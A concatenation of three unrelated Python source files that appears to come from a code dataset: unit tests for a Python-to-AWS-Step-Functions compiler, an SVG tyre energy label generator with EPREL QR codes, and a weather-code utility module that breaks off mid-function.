"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
},
{
"ErrorEquals": ["Exception"],
"IntervalSeconds": 1,
"MaxAttempts": 3,
"BackoffRate": 2.0,
},
],
}
},
},
),
]
UNSUPPORTED_CASES = [
(
"Should raise if unknown task class",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Unknown()
""",
"Supported expressions",
),
(
"Should raise if invalid key option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key=123)
""",
"key",
),
(
"Should raise if invalid timeout option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(timeout="10")
""",
"timeout",
),
(
"Should raise if invalid result path",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
data["__trace"] = Action(key="action")
""",
"reserved",
),
(
"Should raise if multiple tasks in try body",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
Action()
except:
return
""",
"single task statement",
),
(
"Should raise if else used with try",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
except:
return
else:
return
""",
"`else` part",
),
(
"Should raise if finally used with try",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
finally:
return
""",
"`finally` part",
),
(
"Should raise if invalid service",
"""
class Action(Task):
service = "ec2"
async def run(event, context):
return
def main(data):
Action()
""",
"service",
),
(
"Should raise if multiple tasks in retry block",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry():
Action()
Action()
""",
"single task",
),
(
"Should raise if unsupported context manager in with block",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with open():
Action()
""",
"context manager",
),
]
if __name__ == "__main__":
unittest.main() | tests/test_task.py | import unittest
from .util import StateTestCase
class TestTaskState(StateTestCase):
"""Tests for the Task state"""
SUCCESSFUL_CASES = [
(
"Should include a basic task",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set lambda service",
"""
class Action(Task):
service = "lambda"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set lambda:pexpm-runner service",
"""
class Action(Task):
service = "lambda:pexpm-runner"
async def run(event, context):
return
def main(data):
Action(key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"package_name": "${PackageNameAction}",
"package_version": "${PackageVersionAction}",
"command": ["${PackageNameAction}", "run"],
"include_parent_environment": True,
"return_stdout": True,
"environment": {
"SFN_EXECUTION_NAME.$": "$$.Execution.Name",
"SFN_STATE_NAME.$": "$$.State.Name",
"SFN_STATE_MACHINE_NAME.$": "$$.StateMachine.Name",
"TRACE_ID.$": "$.__trace.id",
"TRACE_SOURCE.$": "$.__trace.source",
"SFN_INPUT_VALUE.$": "$",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set ecs service",
"""
class Action(Task):
service = "ecs"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "arn:aws:states:::ecs:runTask.sync",
"Parameters": {
"LaunchType": "FARGATE",
"Cluster": "${ECSClusterArn}",
"TaskDefinition": "${ECSTaskDefinitionAction}",
"NetworkConfiguration": {
"AwsvpcConfiguration": {
"AssignPublicIp": "DISABLED",
"SecurityGroups": [
"${DatabaseSecurityGroup}",
"${PrivateLoadBalancerSecurityGroup}",
],
"Subnets": [
"${Subnet0}",
"${Subnet1}",
"${Subnet2}",
"${Subnet3}",
],
}
},
"Overrides": {
"ContainerOverrides": [
{
"Name": "Action",
"Environment": [
{
"Name": "SFN_EXECUTION_NAME",
"Value.$": "$$.Execution.Name",
},
{
"Name": "SFN_STATE_NAME",
"Value.$": "$$.State.Name",
},
{
"Name": "SFN_STATE_MACHINE_NAME",
"Value.$": "$$.StateMachine.Name",
},
{
"Name": "TRACE_ID",
"Value.$": "$.__trace.id",
},
{
"Name": "TRACE_SOURCE",
"Value.$": "$.__trace.source",
},
],
}
]
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should set ecs:worker service",
"""
class Action(Task):
service = "ecs:worker"
async def run(event, context):
return
def main(data):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "arn:aws:states:::sqs:sendMessage.waitForTaskToken",
"Parameters": {
"QueueUrl": "${QueueUrlAction}",
"MessageGroupId.$": "States.Format('{}_{}', $$.Execution.Name, $$.State.EnteredTime)",
"MessageAttributes": {
"SFN_EXECUTION_NAME": {
"DataType": "String",
"StringValue.$": "$$.Execution.Name",
},
"SFN_STATE_NAME": {
"DataType": "String",
"StringValue.$": "$$.State.Name",
},
"SFN_STATE_MACHINE_NAME": {
"DataType": "String",
"StringValue.$": "$$.StateMachine.Name",
},
# Pass tracing metadata from the input data object
"TRACE_ID": {
"DataType": "String",
"StringValue.$": "$.__trace.id",
},
"TRACE_SOURCE": {
"DataType": "String",
"StringValue.$": "$.__trace.source",
},
},
"MessageBody": {
"Input.$": "$",
"TaskToken.$": "$$.Task.Token",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should accept key option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should accept timeout option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key="action", timeout=10)
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 10,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should accept input data",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(data["input"], key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$['input']",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should set result path",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
data["output"] = Action(data["input"], key="action")
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$['input']",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": "$['output']",
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
}
},
},
),
(
"Should include nested state machine",
"""
def nested(data):
return
def main(data):
nested(key="nested")
""",
{
"StartAt": "nested",
"States": {
"nested": {
"Type": "Task",
"Resource": "arn:aws:states:::states:startExecution.sync",
"Parameters": {
"Input": {
"AWS_STEP_FUNCTIONS_STARTED_BY_EXECUTION_ID.$": "$$.Execution.Id",
"__trace.$": "$.__trace",
"data.$": "$",
},
"StateMachineArn": "${StateMachinenested}",
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
}
},
},
),
(
"Should catch unnamed exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["States.ALL"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch base exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except Exception:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["Exception"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch custom exception",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except CustomError:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should catch multiple exceptions in a single handler",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except (CustomError1, CustomError2):
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError1", "CustomError2"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
}
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should parse multiple exception handlers",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action(key="action")
except CustomError1:
return
except CustomError2:
return
""",
{
"StartAt": "action",
"States": {
"action": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Catch": [
{
"ErrorEquals": ["CustomError1"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
},
{
"ErrorEquals": ["CustomError2"],
"ResultPath": "$.error",
"Next": "Succeed-d1d0f861f06db686c59bfded9f95b5c4",
},
],
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
}
],
},
"Succeed-d1d0f861f06db686c59bfded9f95b5c4": {"Type": "Succeed"},
},
},
),
(
"Should add retry to the task",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry(
on_exceptions=[CustomError, States.TaskFailed],
interval=10,
max_attempts=5,
backoff_rate=3.0
):
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
},
{
"ErrorEquals": ["CustomError", "States.TaskFailed"],
"IntervalSeconds": 10,
"MaxAttempts": 5,
"BackoffRate": 3.0,
},
],
}
},
},
),
(
"Should add retry to the task with default values",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry():
Action()
""",
{
"StartAt": "Action-db6e42286ffe8ccd217c1459c416db7c",
"States": {
"Action-db6e42286ffe8ccd217c1459c416db7c": {
"Type": "Task",
"Resource": "${LambdaFunctionAction}",
"Parameters": {
"data.$": "$",
"meta": {
"sfn_execution_name.$": "$$.Execution.Name",
"sfn_state_machine_name.$": "$$.StateMachine.Name",
"sfn_state_name.$": "$$.State.Name",
"trace_id.$": "$.__trace.id",
"trace_source.$": "$.__trace.source",
},
},
"InputPath": "$",
"ResultPath": None,
"TimeoutSeconds": 300,
"End": True,
"Retry": [
{
"ErrorEquals": [
"Lambda.ServiceException",
"Lambda.AWSLambdaException",
"Lambda.SdkClientException",
],
"IntervalSeconds": 2,
"MaxAttempts": 6,
"BackoffRate": 2,
},
{
"ErrorEquals": ["Exception"],
"IntervalSeconds": 1,
"MaxAttempts": 3,
"BackoffRate": 2.0,
},
],
}
},
},
),
]
UNSUPPORTED_CASES = [
(
"Should raise if unknown task class",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Unknown()
""",
"Supported expressions",
),
(
"Should raise if invalid key option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(key=123)
""",
"key",
),
(
"Should raise if invalid timeout option",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
Action(timeout="10")
""",
"timeout",
),
(
"Should raise if invalid result path",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
data["__trace"] = Action(key="action")
""",
"reserved",
),
(
"Should raise if multiple tasks in try body",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
Action()
except:
return
""",
"single task statement",
),
(
"Should raise if else used with try",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
except:
return
else:
return
""",
"`else` part",
),
(
"Should raise if finally used with try",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
try:
Action()
finally:
return
""",
"`finally` part",
),
(
"Should raise if invalid service",
"""
class Action(Task):
service = "ec2"
async def run(event, context):
return
def main(data):
Action()
""",
"service",
),
(
"Should raise if multiple tasks in retry block",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with retry():
Action()
Action()
""",
"single task",
),
(
"Should raise if unsupported context manager in with block",
"""
class Action(Task):
async def run(event, context):
return
def main(data):
with open():
Action()
""",
"context manager",
),
]
if __name__ == "__main__":
unittest.main() | 0.465387 | 0.362489 |
from pathlib import Path
from typing import Optional
import qrcode
from qrcode.image.svg import SvgPathImage
import xml.etree.ElementTree as ET
from jinja2 import Environment, FileSystemLoader
ROOT_DIR = Path(__file__).resolve().parent
def get_eprel_link(eprel_id: int) -> str:
return 'https://eprel.ec.europa.eu/qr/{}'.format(eprel_id)
class TyreEnergyLabel:
"""
Tyre energy label generator.
Example usage:
label = TyreEnergyLabel(
supplier='Cool Tyre',
type_identifier='94385300',
size='185/75 R16',
tyre_class='C2',
fuel_efficiency='E',
wet_grip='A',
roll_noise=72,
noise_level='C',
snow_grip=True,
ice_grip=True,
eprel_id=381667,
eprel_link='https://eprel.ec.europa.eu/qr/381667'
)
label.save('example.svg')
# optional: get SVG as a string
svg_data = label.as_svg(embed_fonts=True, include_link=True)
"""
META = {
'rating_y': {'A': 38, 'B': 60, 'C': 83, 'D': 106, 'E': 128},
'icon_x': {
1: [73],
2: [48, 124],
3: [11, 87, 144]
},
'allowed_ranges': ('A', 'B', 'C', 'D', 'E')
}
def __init__(self, supplier: str, type_identifier: str, size: str, tyre_class: str,
fuel_efficiency: str, wet_grip: str, roll_noise: int, noise_level: str,
snow_grip: bool, ice_grip: bool, eprel_id: int = None, eprel_link: str = None):
link = eprel_link
if link is None and eprel_id is not None:
link = get_eprel_link(eprel_id)
self.data = {
'supplier': supplier,
'type_identifier': type_identifier,
'size': size,
'class': tyre_class,
'fuel_efficiency': fuel_efficiency.upper(),
'wet_grip': wet_grip.upper(),
'roll_noise': roll_noise,
'noise_level': noise_level.upper(),
'snow_grip': snow_grip,
'ice_grip': ice_grip,
'eprel_link': link,
'icon_count': sum([bool(snow_grip), bool(ice_grip)]) + 1
}
if noise_level and noise_level.upper() not in ('A', 'B', 'C'):
raise ValueError(f'Invalid noise level "{noise_level}", expected A, B or C')
self.jinja_env = Environment(loader=FileSystemLoader(ROOT_DIR / 'templates'))
def get_qrcode(self) -> Optional[str]:
if not self.data['eprel_link']:
return None
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_M,
box_size=11,
border=0
)
qr.add_data(self.data['eprel_link'])
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white", image_factory=SvgPathImage)
svg_path = img.make_path()
return ET.tostring(svg_path, encoding='unicode')
def as_svg(self, embed_fonts: bool = True, include_link: bool = True) -> str:
template = self.jinja_env.get_template('label.svg.j2')
svg = template.render(
embed_fonts=embed_fonts,
include_link=include_link,
tyre=self.data,
meta=self.META,
qr_code=self.get_qrcode()
)
return svg
def save(self, filename):
with open(filename, 'w') as file:
file.write(self.as_svg()) | tyre_label/label.py | from pathlib import Path
from typing import Optional
import qrcode
from qrcode.image.svg import SvgPathImage
import xml.etree.ElementTree as ET
from jinja2 import Environment, FileSystemLoader
ROOT_DIR = Path(__file__).resolve().parent
def get_eprel_link(eprel_id: int) -> str:
return 'https://eprel.ec.europa.eu/qr/{}'.format(eprel_id)
class TyreEnergyLabel:
"""
Tyre energy label generator.
Example usage:
label = TyreEnergyLabel(
supplier='Cool Tyre',
type_identifier='94385300',
size='185/75 R16',
tyre_class='C2',
fuel_efficiency='E',
wet_grip='A',
roll_noise=72,
noise_level='C',
snow_grip=True,
ice_grip=True,
eprel_id=381667,
eprel_link='https://eprel.ec.europa.eu/qr/381667'
)
label.save('example.svg')
# optional: get SVG as a string
svg_data = label.as_svg(embed_fonts=True, include_link=True)
"""
META = {
'rating_y': {'A': 38, 'B': 60, 'C': 83, 'D': 106, 'E': 128},
'icon_x': {
1: [73],
2: [48, 124],
3: [11, 87, 144]
},
'allowed_ranges': ('A', 'B', 'C', 'D', 'E')
}
def __init__(self, supplier: str, type_identifier: str, size: str, tyre_class: str,
fuel_efficiency: str, wet_grip: str, roll_noise: int, noise_level: str,
snow_grip: bool, ice_grip: bool, eprel_id: int = None, eprel_link: str = None):
link = eprel_link
if link is None and eprel_id is not None:
link = get_eprel_link(eprel_id)
self.data = {
'supplier': supplier,
'type_identifier': type_identifier,
'size': size,
'class': tyre_class,
'fuel_efficiency': fuel_efficiency.upper(),
'wet_grip': wet_grip.upper(),
'roll_noise': roll_noise,
'noise_level': noise_level.upper(),
'snow_grip': snow_grip,
'ice_grip': ice_grip,
'eprel_link': link,
'icon_count': sum([bool(snow_grip), bool(ice_grip)]) + 1
}
if noise_level and noise_level.upper() not in ('A', 'B', 'C'):
raise ValueError(f'Invalid noise level "{noise_level}", expected A, B or C')
self.jinja_env = Environment(loader=FileSystemLoader(ROOT_DIR / 'templates'))
def get_qrcode(self) -> Optional[str]:
if not self.data['eprel_link']:
return None
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_M,
box_size=11,
border=0
)
qr.add_data(self.data['eprel_link'])
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white", image_factory=SvgPathImage)
svg_path = img.make_path()
return ET.tostring(svg_path, encoding='unicode')
def as_svg(self, embed_fonts: bool = True, include_link: bool = True) -> str:
template = self.jinja_env.get_template('label.svg.j2')
svg = template.render(
embed_fonts=embed_fonts,
include_link=include_link,
tyre=self.data,
meta=self.META,
qr_code=self.get_qrcode()
)
return svg
def save(self, filename):
with open(filename, 'w') as file:
file.write(self.as_svg()) | 0.876138 | 0.341953 |
"""This module defines the utilities required for wxcode plugin """
from collections import OrderedDict
from improver.wxcode.wxcode_decision_tree import wxcode_decision_tree
from improver.wxcode.wxcode_decision_tree_global import wxcode_decision_tree_global
_WX_DICT_IN = {
0: "Clear_Night",
1: "Sunny_Day",
2: "Partly_Cloudy_Night",
3: "Partly_Cloudy_Day",
4: "Dust",
5: "Mist",
6: "Fog",
7: "Cloudy",
8: "Overcast",
9: "Light_Shower_Night",
10: "Light_Shower_Day",
11: "Drizzle",
12: "Light_Rain",
13: "Heavy_Shower_Night",
14: "Heavy_Shower_Day",
15: "Heavy_Rain",
16: "Sleet_Shower_Night",
17: "Sleet_Shower_Day",
18: "Sleet",
19: "Hail_Shower_Night",
20: "Hail_Shower_Day",
21: "Hail",
22: "Light_Snow_Shower_Night",
23: "Light_Snow_Shower_Day",
24: "Light_Snow",
25: "Heavy_Snow_Shower_Night",
26: "Heavy_Snow_Shower_Day",
27: "Heavy_Snow",
28: "Thunder_Shower_Night",
29: "Thunder_Shower_Day",
30: "Thunder",
}
WX_DICT = OrderedDict(sorted(_WX_DICT_IN.items(), key=lambda t: t[0]))
DAYNIGHT_CODES = [1, 3, 10, 14, 17, 20, 23, 26, 29]
def weather_code_attributes():
"""
Returns:
dict:
Attributes defining weather code meanings.
"""
import numpy as np
attributes = {}
wx_keys = np.array(list(WX_DICT.keys()))
attributes.update({"weather_code": wx_keys})
wxstring = " ".join(WX_DICT.values())
attributes.update({"weather_code_meaning": wxstring})
return attributes
def expand_nested_lists(query, key):
"""
Produce flat lists from list and nested lists.
Args:
query (dict):
A single query from the decision tree.
key (str):
A string denoting the field to be taken from the dict.
Returns:
list:
A 1D list containing all the values for a given key.
"""
items = []
for item in query[key]:
if isinstance(item, list):
items.extend(item)
else:
items.extend([item])
return items
def update_daynight(cubewx):
""" Update weather cube depending on whether it is day or night
Args:
cubewx(iris.cube.Cube):
Cube containing only daytime weather symbols.
Returns:
iris.cube.Cube:
Cube containing day and night weather symbols
Raises:
CoordinateNotFoundError : cube must have time coordinate.
"""
import iris
import numpy as np
from iris.exceptions import CoordinateNotFoundError
import improver.utilities.solar as solar
if not cubewx.coords("time"):
msg = "cube must have time coordinate "
raise CoordinateNotFoundError(msg)
time_dim = cubewx.coord_dims("time")
if not time_dim:
cubewx_daynight = iris.util.new_axis(cubewx.copy(), "time")
else:
cubewx_daynight = cubewx.copy()
daynightplugin = solar.DayNightMask()
daynight_mask = daynightplugin(cubewx_daynight)
# Loop over the codes which decrease by 1 if a night time value
# e.g. 1 - sunny day becomes 0 - clear night.
for val in DAYNIGHT_CODES:
index = np.where(cubewx_daynight.data == val)
# Where day leave as is, where night correct weather
# code to value - 1.
cubewx_daynight.data[index] = np.where(
daynight_mask.data[index] == daynightplugin.day,
cubewx_daynight.data[index],
cubewx_daynight.data[index] - 1,
)
if not time_dim:
cubewx_daynight = iris.util.squeeze(cubewx_daynight)
return cubewx_daynight
def interrogate_decision_tree(wxtree):
"""
Obtain a list of necessary inputs from the decision tree as it is currently
defined. Return a formatted string that contains the diagnostic names, the
thresholds needed, and whether they are thresholded above or below these
values. This output is used to create the CLI help, informing the user of
the necessary inputs.
Args:
wxtree (str):
The weather symbol tree that is to be interrogated.
Returns:
list of str:
Returns a formatted string descring the diagnostics required,
including threshold details.
"""
# Get current weather symbol decision tree and populate a list of
# required inputs for printing.
if wxtree == "high_resolution":
queries = wxcode_decision_tree()
elif wxtree == "global":
queries = wxcode_decision_tree_global()
else:
raise ValueError("Unknown decision tree name provided.")
# Diagnostic names and threshold values.
requirements = {}
for query in queries.values():
diagnostics = get_parameter_names(
expand_nested_lists(query, "diagnostic_fields")
)
thresholds = expand_nested_lists(query, "diagnostic_thresholds")
for diagnostic, threshold in zip(diagnostics, thresholds):
requirements.setdefault(diagnostic, set()).add(threshold)
# Create a list of formatted strings that will be printed as part of the
# CLI help.
output = []
for requirement, uniq_thresh in sorted(requirements.items()):
